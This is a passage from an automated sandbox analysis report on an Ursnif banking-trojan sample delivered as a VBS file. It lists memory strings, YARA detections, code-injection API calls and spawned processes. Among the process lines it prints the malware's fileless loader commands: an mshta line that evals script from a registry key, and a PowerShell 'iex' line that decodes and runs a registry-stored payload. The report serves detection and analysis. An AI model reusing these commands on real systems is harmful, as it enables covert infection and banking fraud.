            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
            Source: msapplication.xml4.19.drString found in binary or memory: http://www.nytimes.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
            Source: msapplication.xml5.19.drString found in binary or memory: http://www.reddit.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
            Source: msapplication.xml6.19.drString found in binary or memory: http://www.twitter.com/
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
            Source: msapplication.xml7.19.drString found in binary or memory: http://www.wikipedia.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
            Source: msapplication.xml8.19.drString found in binary or memory: http://www.youtube.com/
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000006.00000003.579535833.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579647192.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.646154649.0000000002800000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579582589.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.587774108.000000000512B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579617735.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000024.00000002.685503621.0000000004D1E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579669420.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579729595.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579690205.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.701647863.00000000027B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579713449.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.675164378.000000000058E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3508, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 3596, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000006.00000003.579535833.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579647192.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.646154649.0000000002800000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579582589.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.587774108.000000000512B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579617735.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000024.00000002.685503621.0000000004D1E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579669420.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579729595.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579690205.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.701647863.00000000027B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579713449.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.675164378.000000000058E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3508, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 3596, type: MEMORY

            System Summary:

            barindex
            Source: C:\Windows\explorer.exeCode function: 36_2_04CF6F64 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,
            Source: C:\Windows\explorer.exeCode function: 36_2_04CE33F8 NtQueryInformationProcess,
            Source: C:\Windows\explorer.exeCode function: 36_2_04D21003 NtProtectVirtualMemory,NtProtectVirtualMemory,
            Source: C:\Windows\System32\control.exeCode function: 37_2_005568E0 NtReadVirtualMemory,
            Source: C:\Windows\System32\control.exeCode function: 37_2_005670B8 NtMapViewOfSection,
            Source: C:\Windows\System32\control.exeCode function: 37_2_00561154 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,FindCloseChangeNotification,
            Source: C:\Windows\System32\control.exeCode function: 37_2_005729D0 NtAllocateVirtualMemory,
            Source: C:\Windows\System32\control.exeCode function: 37_2_0055C188 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,
            Source: C:\Windows\System32\control.exeCode function: 37_2_00569B08 NtCreateSection,
            Source: C:\Windows\System32\control.exeCode function: 37_2_005533F8 NtQueryInformationProcess,
            Source: C:\Windows\System32\control.exeCode function: 37_2_00552CC0 NtQueryInformationProcess,
            Source: C:\Windows\System32\control.exeCode function: 37_2_00557F44 NtWriteVirtualMemory,
            Source: C:\Windows\System32\control.exeCode function: 37_2_00566F64 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,
            Source: C:\Windows\System32\control.exeCode function: 37_2_00591003 NtProtectVirtualMemory,NtProtectVirtualMemory,
            Source: C:\Windows\explorer.exeCode function: 36_2_04CFAE80
            Source: C:\Windows\explorer.exeCode function: 36_2_04CF2F90
            Source: C:\Windows\explorer.exeCode function: 36_2_04CE7CCC
            Source: C:\Windows\explorer.exeCode function: 36_2_04CE34A0
            Source: C:\Windows\explorer.exeCode function: 36_2_04CEBC1C
            Source: C:\Windows\explorer.exeCode function: 36_2_04CF7434
            Source: C:\Windows\explorer.exeCode function: 36_2_04CE3D81
            Source: C:\Windows\explorer.exeCode function: 36_2_04CFEDA0
            Source: C:\Windows\explorer.exeCode function: 36_2_04CEB55C
            Source: C:\Windows\explorer.exeCode function: 36_2_04D0FD7C
            Source: C:\Windows\explorer.exeCode function: 36_2_04CF7D60
            Source: C:\Windows\explorer.exeCode function: 36_2_04CE4578
            Source: C:\Windows\explorer.exeCode function: 36_2_04D0AD28
            Source: C:\Windows\explorer.exeCode function: 36_2_04D02E04
            Source: C:\Windows\explorer.exeCode function: 36_2_04CE5628
            Source: C:\Windows\explorer.exeCode function: 36_2_04CE8FC8
            Source: C:\Windows\explorer.exeCode function: 36_2_04CF9FD0
            Source: C:\Windows\explorer.exeCode function: 36_2_04D0DFF8
            Source: C:\Windows\explorer.exeCode function: 36_2_04CF07AC
            Source: C:\Windows\explorer.exeCode function: 36_2_04CEAF44
            Source: C:\Windows\explorer.exeCode function: 36_2_04D01F74
            Source: C:\Windows\explorer.exeCode function: 36_2_04CE9F7C
            Source: C:\Windows\explorer.exeCode function: 36_2_04CE4734
            Source: C:\Windows\explorer.exeCode function: 36_2_04D0D72C
            Source: C:\Windows\explorer.exeCode function: 36_2_04D0B0F8
            Source: C:\Windows\explorer.exeCode function: 36_2_04D0F8E8
            Source: C:\Windows\explorer.exeCode function: 36_2_04D08844
            Source: C:\Windows\explorer.exeCode function: 36_2_04CE207C
            Source: C:\Windows\explorer.exeCode function: 36_2_04CE8824
            Source: C:\Windows\explorer.exeCode function: 36_2_04D059F8
            Source: C:\Windows\explorer.exeCode function: 36_2_04CEC188
            Source: C:\Windows\explorer.exeCode function: 36_2_04CE3908
            Source: C:\Windows\explorer.exeCode function: 36_2_04D0610C
            Source: C:\Windows\explorer.exeCode function: 36_2_04CEA2EC
            Source: C:\Windows\explorer.exeCode function: 36_2_04D082E0
            Source: C:\Windows\explorer.exeCode function: 36_2_04CF6A74
            Source: C:\Windows\explorer.exeCode function: 36_2_04D0D26C
            Source: C:\Windows\explorer.exeCode function: 36_2_04CFCA04
            Source: C:\Windows\explorer.exeCode function: 36_2_04CF021C
            Source: C:\Windows\explorer.exeCode function: 36_2_04CF0BB0
            Source: C:\Windows\explorer.exeCode function: 36_2_04D00354
            Source: C:\Windows\explorer.exeCode function: 36_2_04CFE35C
            Source: C:\Windows\explorer.exeCode function: 36_2_04D09344
            Source: C:\Windows\explorer.exeCode function: 36_2_04CE7B14
            Source: C:\Windows\explorer.exeCode function: 36_2_04CFC324
            Source: C:\Windows\explorer.exeCode function: 36_2_04D21570
            Source: C:\Windows\System32\control.exeCode function: 37_2_0055C188
            Source: C:\Windows\System32\control.exeCode function: 37_2_0056AE80
            Source: C:\Windows\System32\control.exeCode function: 37_2_00562F90
            Source: C:\Windows\System32\control.exeCode function: 37_2_00578844
            Source: C:\Windows\System32\control.exeCode function: 37_2_0055207C
            Source: C:\Windows\System32\control.exeCode function: 37_2_00558824
            Source: C:\Windows\System32\control.exeCode function: 37_2_0057B0F8
            Source: C:\Windows\System32\control.exeCode function: 37_2_0057F8E8
            Source: C:\Windows\System32\control.exeCode function: 37_2_0057610C
            Source: C:\Windows\System32\control.exeCode function: 37_2_00553908
            Source: C:\Windows\System32\control.exeCode function: 37_2_005759F8
            Source: C:\Windows\System32\control.exeCode function: 37_2_00566A74
            Source: C:\Windows\System32\control.exeCode function: 37_2_0057D26C
            Source: C:\Windows\System32\control.exeCode function: 37_2_0056021C
            Source: C:\Windows\System32\control.exeCode function: 37_2_0056CA04
            Source: C:\Windows\System32\control.exeCode function: 37_2_005782E0
            Source: C:\Windows\System32\control.exeCode function: 37_2_0055A2EC
            Source: C:\Windows\System32\control.exeCode function: 37_2_00570354
            Source: C:\Windows\System32\control.exeCode function: 37_2_0056E35C
            Source: C:\Windows\System32\control.exeCode function: 37_2_00579344
            Source: C:\Windows\System32\control.exeCode function: 37_2_00557B14
            Source: C:\Windows\System32\control.exeCode function: 37_2_0056C324
            Source: C:\Windows\System32\control.exeCode function: 37_2_00560BB0
            Source: C:\Windows\System32\control.exeCode function: 37_2_0055BC1C
            Source: C:\Windows\System32\control.exeCode function: 37_2_00567434
            Source: C:\Windows\System32\control.exeCode function: 37_2_00557CCC
            Source: C:\Windows\System32\control.exeCode function: 37_2_005534A0
            Source: C:\Windows\System32\control.exeCode function: 37_2_0055B55C
            Source: C:\Windows\System32\control.exeCode function: 37_2_0057FD7C
            Source: C:\Windows\System32\control.exeCode function: 37_2_00554578
            Source: C:\Windows\System32\control.exeCode function: 37_2_00567D60
            Source: C:\Windows\System32\control.exeCode function: 37_2_0057AD28
            Source: C:\Windows\System32\control.exeCode function: 37_2_00553D81
            Source: C:\Windows\System32\control.exeCode function: 37_2_0056EDA0
            Source: C:\Windows\System32\control.exeCode function: 37_2_00572E04
            Source: C:\Windows\System32\control.exeCode function: 37_2_00555628
            Source: C:\Windows\System32\control.exeCode function: 37_2_0055AF44
            Source: C:\Windows\System32\control.exeCode function: 37_2_00571F74
            Source: C:\Windows\System32\control.exeCode function: 37_2_00559F7C
            Source: C:\Windows\System32\control.exeCode function: 37_2_00554734
            Source: C:\Windows\System32\control.exeCode function: 37_2_0057D72C
            Source: C:\Windows\System32\control.exeCode function: 37_2_00569FD0
            Source: C:\Windows\System32\control.exeCode function: 37_2_00558FC8
            Source: C:\Windows\System32\control.exeCode function: 37_2_0057DFF8
            Source: C:\Windows\System32\control.exeCode function: 37_2_005607AC
            Source: my_presentation_96642.vbsInitial sample: Strings found which are bigger than 50
            Source: a11zr31h.dll.32.drStatic PE information: No import functions for PE file found
            Source: x0s3qhtp.dll.34.drStatic PE information: No import functions for PE file found
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: classification engineClassification label: mal100.troj.evad.winVBS@24/51@4/2
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{4B9FB8E4-F8AF-11EA-90E2-ECF4BB862DED}.datJump to behavior
            Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{226BE949-19F0-A41A-B376-5D18970AE1CC}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{2AD27732-815B-ECFE-5BFE-45E0BF124914}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3612:120:WilError_01
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\my_presentation_96642.vbs'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: my_presentation_96642.vbsVirustotal: Detection: 14%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\my_presentation_96642.vbs'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:9474 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:3740956 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75030 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75038 /prefetch:2
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES235.tmp' 'c:\Users\user\AppData\Local\Temp\CSC37C4AB5BD67C482EA05BF33DBF5C85DE.TMP'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\x0s3qhtp.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES12CF.tmp' 'c:\Users\user\AppData\Local\Temp\CSCF573EE57D69F4661A05CCF421E73DB.TMP'
            Source: unknownProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:9474 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:3740956 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75030 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75038 /prefetch:2
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\x0s3qhtp.cmdline'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES235.tmp' 'c:\Users\user\AppData\Local\Temp\CSC37C4AB5BD67C482EA05BF33DBF5C85DE.TMP'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES12CF.tmp' 'c:\Users\user\AppData\Local\Temp\CSCF573EE57D69F4661A05CCF421E73DB.TMP'
            Source: C:\Windows\System32\control.exeProcess created: unknown unknown
